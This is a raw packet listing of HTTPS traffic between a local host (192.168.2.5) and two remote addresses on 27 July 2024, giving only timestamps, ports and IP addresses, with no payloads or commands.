Jul 27, 2024 07:30:20.070065975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.070106983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.070111990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.070132971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.070158958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.070456982 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.083123922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.083138943 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.083203077 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.083209038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.083460093 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.083515882 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.083520889 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.083585024 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.128300905 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.128319025 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.128385067 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.128390074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.130878925 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.158909082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.158936977 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.158999920 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159006119 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159104109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159308910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159322977 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159364939 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159368992 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159387112 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159405947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159816980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159837961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159869909 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159874916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.159892082 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.159991980 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.160290003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.160303116 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.160341978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.160346985 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.160363913 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.160384893 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.160722971 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.160737038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.160775900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.160780907 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.160794973 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.160816908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.173680067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.173693895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.173777103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.173782110 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.174180984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.174199104 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.174236059 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.174245119 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.174258947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.174283028 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.219199896 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.219224930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.219295025 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.219311953 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.220182896 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.249587059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.249603033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.249689102 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.249697924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.249809980 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.250098944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.250116110 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.250169992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.250178099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.250201941 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.250233889 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.250627995 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.250643015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.250682116 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.250688076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.250747919 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.250747919 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.251055002 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.251074076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.251112938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.251118898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.251147032 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.251545906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.251564980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.251585007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.251594067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.251621008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.251621008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.251637936 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.264240026 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.264256954 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.264343023 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.264350891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.267049074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.267076015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.267123938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.267131090 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.267153978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.267179012 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.309787035 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.309811115 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.309856892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.309864044 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.309885025 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.309906006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.340373993 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.340384960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.340461969 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.340473890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.340514898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.340754986 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.340787888 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.340830088 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.340835094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.340863943 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.340881109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.341154099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.341232061 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.341243982 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.341300964 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.341582060 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.341598988 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.341639996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.341646910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.341680050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.341680050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.342617035 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.342634916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.342694044 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.342705965 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.342720032 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.342808962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.342808962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.355014086 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.355037928 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.355115891 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.355123997 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.355199099 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.357975960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.357990980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.358042002 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.358051062 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.358202934 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.400469065 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.400490999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.400542021 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.400552034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.400564909 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.404134035 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.431849957 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.431879044 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.431907892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.431912899 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.431941032 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.431957960 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.432245970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.432260990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.432313919 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.432322025 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.432526112 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.432646990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.432661057 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.432703018 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.432710886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.432728052 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.432749987 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.433043003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.433067083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.433095932 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.433101892 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.433115005 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.433178902 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.433518887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.433532953 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.433585882 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.433585882 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.433593988 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.433659077 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.434483051 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.445710897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.445734024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.445786953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.445794106 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.445807934 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.445832968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.448731899 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.448764086 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.448802948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.448810101 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.448836088 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.448852062 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.491322994 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.491369009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.491437912 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.491450071 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.491461992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.492120981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.522434950 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.522474051 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.522517920 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.522524118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.522555113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.522564888 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.522670031 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.522736073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.522742033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.522797108 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.522989988 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.523031950 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.523052931 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.523060083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.523082972 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.523101091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.523335934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.523375034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.523392916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.523399115 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.523427963 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.523439884 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.524250984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.524291039 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.524313927 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.524319887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.524346113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.524357080 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.524925947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.536474943 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.536519051 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.536536932 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.536542892 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.536578894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.536587954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.539989948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.540009975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.540106058 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.540113926 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.540170908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.582494020 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.582535982 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.582684994 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.582700968 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.584552050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614219904 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614284039 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614429951 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614429951 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614442110 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614470959 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614506006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614520073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614522934 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614542961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614574909 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614593983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614729881 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614769936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614790916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614799023 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.614825010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.614835024 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.615192890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.615243912 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.615262032 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.615267038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.615329981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.615554094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.615617037 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.615622997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.615622997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.615644932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.615679979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.615700006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.627151966 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.627171040 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.627222061 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.627228975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.628349066 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.630445004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.630466938 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.630551100 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.630558014 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.631987095 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.673650980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.673695087 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.673731089 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.673738003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.673763037 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.673774958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.696894884 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:20.697069883 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:20.697189093 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:20.704144955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704190969 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704225063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704231977 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704262972 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704277039 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704457998 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704525948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704538107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704600096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704881907 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704921961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704946995 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704952955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.704963923 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704982042 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.704994917 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705077887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.705118895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.705142021 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705147028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.705166101 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705183029 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705589056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.705627918 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.705651999 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705657005 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.705668926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705691099 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.705699921 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.711371899 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:20.711429119 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:20.711460114 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:20.711476088 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:20.718136072 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.718179941 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.718214989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:20.718221903 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:20.718234062 CEST	51812	443	192.168.2.5	185.149.100.242
